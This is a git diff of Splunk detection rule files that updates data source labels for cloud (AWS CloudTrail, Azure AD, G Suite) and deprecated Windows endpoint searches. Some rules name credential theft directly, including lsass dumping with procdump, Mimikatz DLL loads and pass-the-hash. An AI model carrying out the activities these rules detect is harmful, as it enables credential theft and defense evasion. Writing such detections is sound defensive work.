 data_source:
-- AWS CloudTrail CreateLoginProfile
-- AWS CloudTrail ConsoleLogin
+- AWS CloudTrail CreateLoginProfile AND AWS CloudTrail ConsoleLogin
 search: '`cloudtrail` eventName = CreateLoginProfile | rename requestParameters.userName
   as new_login_profile | table src_ip eventName new_login_profile userIdentity.userName  |
   join new_login_profile src_ip [| search `cloudtrail` eventName = ConsoleLogin |
diff --git a/detections/cloud/aws_cross_account_activity_from_previously_unseen_account.yml b/detections/cloud/aws_cross_account_activity_from_previously_unseen_account.yml
index ec8448813e..9e71e4ecdd 100644
--- a/detections/cloud/aws_cross_account_activity_from_previously_unseen_account.yml
+++ b/detections/cloud/aws_cross_account_activity_from_previously_unseen_account.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies AssumeRole events where an IAM ro
   escalation attempts. If confirmed malicious, an attacker could gain unauthorized
   access to resources in another account, potentially leading to data exfiltration,
   service disruption, or further compromise of the AWS environment.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats min(_time) as firstTime max(_time) as lastTime from datamodel=Authentication
   where Authentication.signature=AssumeRole by Authentication.vendor_account Authentication.user
   Authentication.src Authentication.user_role | `drop_dm_object_name(Authentication)`
diff --git a/detections/cloud/aws_defense_evasion_impair_security_services.yml b/detections/cloud/aws_defense_evasion_impair_security_services.yml
index a9a0b4337e..df7ea110b8 100644
--- a/detections/cloud/aws_defense_evasion_impair_security_services.yml
+++ b/detections/cloud/aws_defense_evasion_impair_security_services.yml
@@ -14,13 +14,13 @@ description: The following analytic detects attempts to delete critical AWS secu
   escalate privileges, or exfiltrate data without triggering security alerts, severely
   compromising the security posture of the AWS environment.
 data_source:
-- AWS CloudTrail DeleteLogStream
-- AWS CloudTrail DeleteDetector
-- AWS CloudTrail DeleteIPSet
-- AWS CloudTrail DeleteWebACL
-- AWS CloudTrail DeleteRule
-- AWS CloudTrail DeleteRuleGroup
-- AWS CloudTrail DeleteLoggingConfiguration
+- AWS CloudTrail DeleteLogStream 
+- AWS CloudTrail DeleteDetector 
+- AWS CloudTrail DeleteIPSet 
+- AWS CloudTrail DeleteWebACL 
+- AWS CloudTrail DeleteRule 
+- AWS CloudTrail DeleteRuleGroup 
+- AWS CloudTrail DeleteLoggingConfiguration 
 - AWS CloudTrail DeleteAlarms
 search: '`cloudtrail` eventName IN ("DeleteLogStream","DeleteDetector","DeleteIPSet","DeleteWebACL","DeleteRule","DeleteRuleGroup","DeleteLoggingConfiguration","DeleteAlarms")
   | stats count min(_time) as firstTime max(_time) as lastTime values(eventName)  as
diff --git a/detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml b/detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
index 3546a2c397..ffdd1b1caa 100644
--- a/detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
+++ b/detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation of AWS KMS keys with an
   encryption, potentially disrupting operations and compromising sensitive information
   across multiple entities.
 data_source:
-- AWS CloudTrail CreateKey
+- AWS CloudTrail CreateKey 
 - AWS CloudTrail PutKeyPolicy
 search: '`cloudtrail` eventName=CreateKey OR eventName=PutKeyPolicy | spath input=requestParameters.policy
   output=key_policy_statements path=Statement{} | mvexpand key_policy_statements |
diff --git a/detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml b/detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml
index 449c60efe9..75dbada08b 100644
--- a/detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml
+++ b/detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies users with KMS keys performing en
   exfiltration or tampering efforts. If confirmed malicious, an attacker could be
   encrypting sensitive data to evade detection or preparing it for exfiltration, posing
   a significant risk to data integrity and confidentiality.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '`cloudtrail` eventName=CopyObject requestParameters.x-amz-server-side-encryption="aws:kms"
   | rename requestParameters.bucketName AS bucketName, requestParameters.x-amz-copy-source
   AS src_file, requestParameters.key AS dest_file | stats count min(_time) as firstTime
diff --git a/detections/cloud/aws_exfiltration_via_ec2_snapshot.yml b/detections/cloud/aws_exfiltration_via_ec2_snapshot.yml
index 11f1b6109f..376e9183dd 100644
--- a/detections/cloud/aws_exfiltration_via_ec2_snapshot.yml
+++ b/detections/cloud/aws_exfiltration_via_ec2_snapshot.yml
@@ -6,9 +6,9 @@ author: Bhavin Patel, Splunk
 status: production
 type: TTP
 data_source:
-- AWS CloudTrail CreateSnapshot
-- AWS CloudTrail DescribeSnapshotAttribute
-- AWS CloudTrail ModifySnapshotAttribute
+- AWS CloudTrail CreateSnapshot 
+- AWS CloudTrail DescribeSnapshotAttribute 
+- AWS CloudTrail ModifySnapshotAttribute 
 - AWS CloudTrail DeleteSnapshot
 description: The following analytic detects a series of AWS API calls related to EC2
   snapshots within a short time window, indicating potential exfiltration via EC2
diff --git a/detections/cloud/aws_multi_factor_authentication_disabled.yml b/detections/cloud/aws_multi_factor_authentication_disabled.yml
index fdd8ede3df..ca298fb049 100644
--- a/detections/cloud/aws_multi_factor_authentication_disabled.yml
+++ b/detections/cloud/aws_multi_factor_authentication_disabled.yml
@@ -13,7 +13,7 @@ description: The following analytic detects attempts to disable multi-factor aut
   action could allow attackers to retain access to the AWS environment without detection,
   posing a significant risk to the security and integrity of the cloud infrastructure.
 data_source:
-- AWS CloudTrail DeleteVirtualMFADevice
+- AWS CloudTrail DeleteVirtualMFADevice 
 - AWS CloudTrail DeactivateMFADevice
 search: '`cloudtrail` (eventName= DeleteVirtualMFADevice OR eventName=DeactivateMFADevice)
   | stats count min(_time) as firstTime max(_time) as lastTime by src eventName eventSource
diff --git a/detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml b/detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml
index 185dc52314..9ff1aab050 100644
--- a/detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml
+++ b/detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation of AWS Network Access C
   this misconfiguration to gain unrestricted access to the network, potentially leading
   to data exfiltration, service disruption, or further compromise of the AWS environment.
 data_source:
-- AWS CloudTrail CreateNetworkAclEntry
+- AWS CloudTrail CreateNetworkAclEntry 
 - AWS CloudTrail ReplaceNetworkAclEntry
 search: '`cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry
   requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol=-1
diff --git a/detections/cloud/aws_password_policy_changes.yml b/detections/cloud/aws_password_policy_changes.yml
index af1c3de763..913ce9b858 100644
--- a/detections/cloud/aws_password_policy_changes.yml
+++ b/detections/cloud/aws_password_policy_changes.yml
@@ -14,8 +14,8 @@ description: The following analytic detects successful API calls to view, update
   could lead to compromised accounts and increased attack surface, potentially allowing
   unauthorized access and control over AWS resources.
 data_source:
-- AWS CloudTrail UpdateAccountPasswordPolicy
-- AWS CloudTrail GetAccountPasswordPolicy
+- AWS CloudTrail UpdateAccountPasswordPolicy 
+- AWS CloudTrail GetAccountPasswordPolicy 
 - AWS CloudTrail DeleteAccountPasswordPolicy
 search: '`cloudtrail` eventName IN ("UpdateAccountPasswordPolicy","GetAccountPasswordPolicy","DeleteAccountPasswordPolicy")
   errorCode=success | stats count values(eventName) as eventName values(userAgent)
diff --git a/detections/cloud/azure_ad_user_enabled_and_password_reset.yml b/detections/cloud/azure_ad_user_enabled_and_password_reset.yml
index d5914a8161..6827fe05be 100644
--- a/detections/cloud/azure_ad_user_enabled_and_password_reset.yml
+++ b/detections/cloud/azure_ad_user_enabled_and_password_reset.yml
@@ -13,8 +13,8 @@ description: The following analytic detects an Azure AD user enabling a previous
   allow the attacker to maintain persistent access, escalate privileges, and potentially
   exfiltrate sensitive information from the environment.
 data_source:
-- Azure Active Directory Enable account
-- Azure Active Directory Reset password (by admin)
+- Azure Active Directory Enable account 
+- Azure Active Directory Reset password (by admin) 
 - Azure Active Directory Update user
 search: ' `azure_monitor_aad`  (operationName="Enable account" OR operationName="Reset
   password (by admin)" OR operationName="Update user") | transaction user startsWith=(operationName="Enable
diff --git a/detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml b/detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml
index ca2e5983db..f34a186296 100644
--- a/detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml
+++ b/detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml
@@ -7,7 +7,8 @@ status: experimental
 type: Anomaly
 description: |-
   The following analytic detects cloud API calls executed by user roles that have not previously run these commands. It leverages the Change data model in Splunk to identify commands executed by users with the user_type of AssumedRole and a status of success. This activity is significant because new commands from different user roles can indicate potential malicious activity or unauthorized actions. If confirmed malicious, this behavior could lead to unauthorized access, data breaches, or other damaging outcomes by exploiting new or unmonitored commands within the cloud environment.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change
   where All_Changes.user_type=AssumedRole AND All_Changes.status=success by All_Changes.user,
   All_Changes.command All_Changes.object | `drop_dm_object_name("All_Changes")` |
diff --git a/detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml b/detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml
index 947a556374..3222e4c2d7 100644
--- a/detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml
+++ b/detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies the creation of cloud compute ins
   access or misuse of cloud resources by new or compromised accounts. If confirmed
   malicious, attackers could deploy unauthorized compute instances, leading to potential
   data exfiltration, increased costs, or further exploitation within the cloud environment.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats `security_content_summariesonly` count earliest(_time) as firstTime,
   latest(_time) as lastTime values(All_Changes.object) as dest from datamodel=Change
   where All_Changes.action=created by All_Changes.user All_Changes.vendor_region |
diff --git a/detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml b/detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml
index a638de67a2..e7b1e13efb 100644
--- a/detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml
+++ b/detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml
@@ -13,7 +13,8 @@ description: The following analytic detects the creation of a cloud compute inst
   activity, such as an attacker attempting to evade detection or establish a foothold
   in a less monitored area. If confirmed malicious, this could lead to unauthorized
   resource usage, data exfiltration, or further compromise of the cloud environment.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats earliest(_time) as firstTime latest(_time) as lastTime values(All_Changes.object_id)
   as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.vendor_region,
   All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_regions
diff --git a/detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml b/detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml
index 7114193294..59875c8683 100644
--- a/detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml
+++ b/detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml
@@ -7,7 +7,8 @@ status: experimental
 type: Anomaly
 description: |-
   The following analytic detects the creation of cloud compute instances using previously unseen image IDs. It leverages cloud infrastructure logs to identify new image IDs that have not been observed before. This activity is significant because it may indicate unauthorized or suspicious activity, such as the deployment of malicious payloads or unauthorized access to sensitive information. If confirmed malicious, this could lead to data breaches, unauthorized access, or further compromise of the cloud environment. Immediate investigation is required to determine the legitimacy of the instance creation and to mitigate potential threats.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id)
   as dest from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.image_id,
   All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")`
diff --git a/detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml b/detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml
index 51ba95c9c5..85af9797fc 100644
--- a/detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml
+++ b/detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml
@@ -13,7 +13,8 @@ description: The following analytic detects the creation of EC2 instances with p
   purposes. If confirmed malicious, this could lead to unauthorized access, data exfiltration,
   system compromise, or service disruption. Immediate investigation is required to
   determine the legitimacy of the instance creation.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id)
   as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.instance_type,
   All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")`
diff --git a/detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml b/detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml
index b2bf148f5e..b80986d4ea 100644
--- a/detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml
+++ b/detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies cloud instances being modified by
   or malicious users. If confirmed malicious, this could lead to unauthorized access,
   configuration changes, or potential disruption of cloud services, posing a significant
   risk to the organization's cloud infrastructure.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats `security_content_summariesonly` count earliest(_time) as firstTime,
   latest(_time) as lastTime values(All_Changes.object_id) as object_id values(All_Changes.command)
   as command from datamodel=Change where All_Changes.action=modified All_Changes.change_type=EC2
diff --git a/detections/cloud/detect_aws_console_login_by_new_user.yml b/detections/cloud/detect_aws_console_login_by_new_user.yml
index a5f08b2e0c..523d3cb63b 100644
--- a/detections/cloud/detect_aws_console_login_by_new_user.yml
+++ b/detections/cloud/detect_aws_console_login_by_new_user.yml
@@ -12,7 +12,8 @@ description: The following analytic detects AWS console login events by new user
   unauthorized access. If confirmed malicious, this activity could lead to unauthorized
   access to AWS resources, data exfiltration, or further exploitation within the cloud
   environment.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication
   where Authentication.signature=ConsoleLogin by Authentication.user | `drop_dm_object_name(Authentication)`
   | join user type=outer [ | inputlookup previously_seen_users_console_logins | stats
diff --git a/detections/cloud/detect_new_open_s3_buckets.yml b/detections/cloud/detect_new_open_s3_buckets.yml
index 64a68a65f9..c4198c281d 100644
--- a/detections/cloud/detect_new_open_s3_buckets.yml
+++ b/detections/cloud/detect_new_open_s3_buckets.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies the creation of open/public S3 bu
   data to unauthorized access, leading to data breaches. If confirmed malicious, an
   attacker could read, write, or fully control the contents of the bucket, potentially
   leading to data exfiltration or tampering.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '`cloudtrail` eventSource=s3.amazonaws.com eventName=PutBucketAcl | rex field=_raw
   "(?<json_field>{.+})" | spath input=json_field output=grantees path=requestParameters.AccessControlPolicy.AccessControlList.Grant{}
   | search grantees=* | mvexpand grantees | spath input=grantees output=uri path=Grantee.URI
diff --git a/detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml b/detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml
index c81623d904..91cabf7138 100644
--- a/detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml
+++ b/detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml
@@ -12,7 +12,8 @@ description: The following analytic detects the creation of open/public S3 bucke
   unauthorized users, leading to data breaches. If confirmed malicious, an attacker
   could gain unauthorized access to potentially sensitive information stored in the
   S3 bucket, posing a significant security risk.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '`cloudtrail` eventSource="s3.amazonaws.com" (userAgent="[aws-cli*" OR userAgent=aws-cli*
   ) eventName=PutBucketAcl OR requestParameters.accessControlList.x-amz-grant-read-acp
   IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write
diff --git a/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml b/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml
index 56d8380142..131d791a79 100644
--- a/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml
+++ b/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies a spike in the number of AWS Secu
   attention. If confirmed malicious, this could signify an ongoing attack, leading
   to unauthorized access, data exfiltration, or disruption of services on the affected
   EC2 instance.
-data_source: []
+data_source:
+- AWS Security Hub
 search: '`aws_securityhub_finding` "Resources{}.Type"=AWSEC2Instance | bucket span=4h
   _time | stats count AS alerts values(Title) as Title values(Types{}) as Types values(vendor_account)
   as vendor_account values(vendor_region) as vendor_region values(severity) as severity
@@ -57,7 +58,6 @@ tags:
 tests:
 - name: True Positive Test
   attack_data:
-  - data: 
-      https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/security_hub_ec2_spike/security_hub_ec2_spike.json
+  - data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/security_hub_ec2_spike/security_hub_ec2_spike.json
     sourcetype: aws:securityhub:finding
     source: aws_securityhub_finding
diff --git a/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml b/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml
index 154cc31d2f..14a717bb9a 100644
--- a/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml
+++ b/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies a spike in the number of AWS Secu
   for a specific user may indicate suspicious behavior or a potential security incident.
   If confirmed malicious, this could signify an ongoing attack, unauthorized access,
   or misuse of IAM credentials, potentially leading to data breaches or further exploitation.
-data_source: []
+data_source:
+- AWS Security Hub
 search: '`aws_securityhub_finding` "findings{}.Resources{}.Type"= AwsIamUser | rename
   findings{}.Resources{}.Id as user | bucket span=4h _time | stats count AS alerts
   by _time user | eventstats avg(alerts) as total_launched_avg, stdev(alerts) as total_launched_stdev
diff --git a/detections/cloud/detect_spike_in_s3_bucket_deletion.yml b/detections/cloud/detect_spike_in_s3_bucket_deletion.yml
index aa766740e1..88ed86c86e 100644
--- a/detections/cloud/detect_spike_in_s3_bucket_deletion.yml
+++ b/detections/cloud/detect_spike_in_s3_bucket_deletion.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies a spike in API activity related t
   destruction. If confirmed malicious, this could lead to significant data loss, disruption
   of services, and potential exposure of sensitive information. Immediate investigation
   is required to determine the legitimacy of the activity.
-data_source: []
+data_source: 
+- AWS CloudTrail
 search: '`cloudtrail` eventName=DeleteBucket [search `cloudtrail` eventName=DeleteBucket
   | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup
   s3_deletion_baseline append=t | fields - latestCount | stats values(*) as * by arn
diff --git a/detections/cloud/gsuite_drive_share_in_external_email.yml b/detections/cloud/gsuite_drive_share_in_external_email.yml
index 1415347b8c..a6e197b24e 100644
--- a/detections/cloud/gsuite_drive_share_in_external_email.yml
+++ b/detections/cloud/gsuite_drive_share_in_external_email.yml
@@ -12,7 +12,8 @@ description: The following analytic detects Google Drive or Google Docs files sh
   attacker or insider. If confirmed malicious, this could lead to unauthorized access
   to sensitive information, data leakage, and potential compliance violations. Monitoring
   this behavior helps in early detection and mitigation of data breaches.
-data_source: []
+data_source: 
+- G Suite Drive
 search: '`gsuite_drive` NOT (email IN("", "null")) | rex field=parameters.owner "[^@]+@(?<src_domain>[^@]+)"
   | rex field=email "[^@]+@(?<dest_domain>[^@]+)" | where src_domain = "internal_test_email.com"
   and not dest_domain = "internal_test_email.com" | eval phase="plan" | eval severity="low"
diff --git a/detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml b/detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml
index bd9b79e5ff..6dac7c57d2 100644
--- a/detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml
+++ b/detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml
@@ -6,7 +6,7 @@ author: Mauricio Velazco, Splunk
 status: production
 type: Anomaly
 data_source:
-- O365 UserLoggedIn
+- O365 UserLoggedIn 
 - O365 UserLoginFailed
 description: The following analytic identifies unusual authentication activity in
   an O365 environment, where a single user account experiences more than 8 authentication
diff --git a/detections/deprecated/detect_activity_related_to_pass_the_hash_attacks.yml b/detections/deprecated/detect_activity_related_to_pass_the_hash_attacks.yml
index d7e447007a..0c911874c3 100644
--- a/detections/deprecated/detect_activity_related_to_pass_the_hash_attacks.yml
+++ b/detections/deprecated/detect_activity_related_to_pass_the_hash_attacks.yml
@@ -8,7 +8,7 @@ type: Hunting
 description: This search looks for specific authentication events from the Windows
   Security Event logs to detect potential attempts at using the Pass-the-Hash technique. This search is DEPRECATED as it is possible for event code 4624 to generate a high level of noise, as legitimate logon events may also trigger this event code. This can be especially true in environments with high levels of user activity, such as those with many concurrent logons or frequent logon attempts.
 data_source:
-- Windows Security 4624
+- Windows Event Log Security 4624
 search: '`wineventlog_security` EventCode=4624 (Logon_Type=3 Logon_Process=NtLmSsp NOT AccountName="ANONYMOUS LOGON") OR (Logon_Type=9 Logon_Process=seclogo) 
 | fillnull 
 | stats count min(_time) as firstTime max(_time) as lastTime by EventCode, Logon_Type, WorkstationName, user, dest 
diff --git a/detections/deprecated/detect_mimikatz_using_loaded_images.yml b/detections/deprecated/detect_mimikatz_using_loaded_images.yml
index 02d6963b9f..3d89d50c5d 100644
--- a/detections/deprecated/detect_mimikatz_using_loaded_images.yml
+++ b/detections/deprecated/detect_mimikatz_using_loaded_images.yml
@@ -8,7 +8,7 @@ type: TTP
 description: This search looks for reading loaded Images unique to credential dumping
   with Mimikatz. Deprecated because mimikatz libraries changed and very noisy sysmon Event Code.
 data_source:
-- Sysmon Event ID 7
+- Sysmon EventID 7
 search: '`sysmon` EventCode=7 | stats values(ImageLoaded) as ImageLoaded values(ProcessId)
   as ProcessId by dest, Image | search ImageLoaded=*WinSCard.dll ImageLoaded=*cryptdll.dll
   ImageLoaded=*hid.dll ImageLoaded=*samlib.dll ImageLoaded=*vaultcli.dll | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
diff --git a/detections/deprecated/dump_lsass_via_procdump_rename.yml b/detections/deprecated/dump_lsass_via_procdump_rename.yml
index cb21bd1476..904d367839 100644
--- a/detections/deprecated/dump_lsass_via_procdump_rename.yml
+++ b/detections/deprecated/dump_lsass_via_procdump_rename.yml
@@ -15,7 +15,7 @@ description: 'Detect a renamed instance of procdump.exe dumping the lsass proces
   the command line. Review other endpoint data sources for cross process (injection)
   into lsass.exe.'
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '`sysmon` OriginalFileName=procdump  process_name!=procdump*.exe  EventID=1
   (CommandLine=*-ma* OR CommandLine=*-mm*) CommandLine=*lsass* |  stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name,
   process_name, OriginalFileName, CommandLine | `security_content_ctime(firstTime)`
diff --git a/detections/deprecated/execution_of_file_with_spaces_before_extension.yml b/detections/deprecated/execution_of_file_with_spaces_before_extension.yml
index 2b512d11e3..7519f91f51 100644
--- a/detections/deprecated/execution_of_file_with_spaces_before_extension.yml
+++ b/detections/deprecated/execution_of_file_with_spaces_before_extension.yml
@@ -9,7 +9,7 @@ description: This search looks for processes launched from files with at least f
   spaces in the name before the extension. This is typically done to obfuscate the
   file extension by pushing it outside of the default view.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count values(Processes.process_path)
   as process_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.process = "*     .*" by Processes.dest Processes.user Processes.process
diff --git a/detections/deprecated/first_time_seen_command_line_argument.yml b/detections/deprecated/first_time_seen_command_line_argument.yml
index 3e63b16ad4..b29165d760 100644
--- a/detections/deprecated/first_time_seen_command_line_argument.yml
+++ b/detections/deprecated/first_time_seen_command_line_argument.yml
@@ -8,7 +8,7 @@ type: Hunting
 description: This search looks for command-line arguments that use a `/c` parameter
   to execute a command that has not previously been seen.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe
   Processes.process = "* /c *" by Processes.process Processes.process_name Processes.parent_process_name
diff --git a/detections/deprecated/processes_created_by_netsh.yml b/detections/deprecated/processes_created_by_netsh.yml
index 3ecfc79310..9caca611a1 100644
--- a/detections/deprecated/processes_created_by_netsh.yml
+++ b/detections/deprecated/processes_created_by_netsh.yml
@@ -13,7 +13,7 @@ description: This search looks for processes launching netsh.exe to execute vari
   we are looking for processes spawned by netsh.exe that are executing commands via
   the command line. Deprecated because we have another detection of the same type.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.process_name=netsh.exe by Processes.user Processes.dest Processes.parent_process
diff --git a/detections/deprecated/prohibited_software_on_endpoint.yml b/detections/deprecated/prohibited_software_on_endpoint.yml
index 19c26ef4b0..27b76ed896 100644
--- a/detections/deprecated/prohibited_software_on_endpoint.yml
+++ b/detections/deprecated/prohibited_software_on_endpoint.yml
@@ -8,7 +8,7 @@ type: Hunting
 description: This search looks for applications on the endpoint that you have marked
   as prohibited.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process_name
   | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)`
diff --git a/detections/deprecated/reg_exe_used_to_hide_files_directories_via_registry_keys.yml b/detections/deprecated/reg_exe_used_to_hide_files_directories_via_registry_keys.yml
index 2ea024a58f..26ee538d51 100644
--- a/detections/deprecated/reg_exe_used_to_hide_files_directories_via_registry_keys.yml
+++ b/detections/deprecated/reg_exe_used_to_hide_files_directories_via_registry_keys.yml
@@ -8,7 +8,7 @@ type: TTP
 description: The search looks for command-line arguments used to hide a file or directory
   using the reg add command.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where Processes.process_name = reg.exe Processes.process="*add*" Processes.process="*Hidden*"
diff --git a/detections/deprecated/remote_registry_key_modifications.yml b/detections/deprecated/remote_registry_key_modifications.yml
index dd3149032e..8c8435ee89 100644
--- a/detections/deprecated/remote_registry_key_modifications.yml
+++ b/detections/deprecated/remote_registry_key_modifications.yml
@@ -7,7 +7,7 @@ status: deprecated
 type: TTP
 description: This search monitors for remote modifications to registry keys.
 data_source:
-- Sysmon Event ID 13
+- Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count values(Registry.registry_key_name)
   as registry_key_name values(Registry.registry_path) as registry_path min(_time)
   as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where  Registry.registry_path="\\\\*"  by
diff --git a/detections/deprecated/scheduled_tasks_used_in_badrabbit_ransomware.yml b/detections/deprecated/scheduled_tasks_used_in_badrabbit_ransomware.yml
index 3c511d4da3..e7d235b110 100644
--- a/detections/deprecated/scheduled_tasks_used_in_badrabbit_ransomware.yml
+++ b/detections/deprecated/scheduled_tasks_used_in_badrabbit_ransomware.yml
@@ -9,7 +9,7 @@ description: This search looks for flags passed to schtasks.exe on the command-l
   that indicate that task names related to the execution of Bad Rabbit ransomware
   were created or deleted. Deprecated because we already have a similar detection
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Processes.process) as process  from datamodel=Endpoint.Processes
   where Processes.process_name=schtasks.exe (Processes.process= "*create*"  OR Processes.process=
diff --git a/detections/deprecated/suspicious_changes_to_file_associations.yml b/detections/deprecated/suspicious_changes_to_file_associations.yml
index 1d0f536cf9..08ca5c2989 100644
--- a/detections/deprecated/suspicious_changes_to_file_associations.yml
+++ b/detections/deprecated/suspicious_changes_to_file_associations.yml
@@ -9,7 +9,7 @@ description: This search looks for changes to registry values that control Windo
   file associations, executed by a process that is not typical for legitimate, routine
   changes to this area.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name)
   as parent_process_name FROM datamodel=Endpoint.Processes where Processes.process_name!=Explorer.exe
diff --git a/detections/deprecated/suspicious_file_write.yml b/detections/deprecated/suspicious_file_write.yml
index 8adf06a7f0..b7a2b0c9ef 100644
--- a/detections/deprecated/suspicious_file_write.yml
+++ b/detections/deprecated/suspicious_file_write.yml
@@ -8,7 +8,7 @@ type: Hunting
 description: The search looks for files created with names that have been linked to
   malicious activity.
 data_source:
-- Sysmon Event ID 11
+- Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count values(Filesystem.action)
   as action values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time)
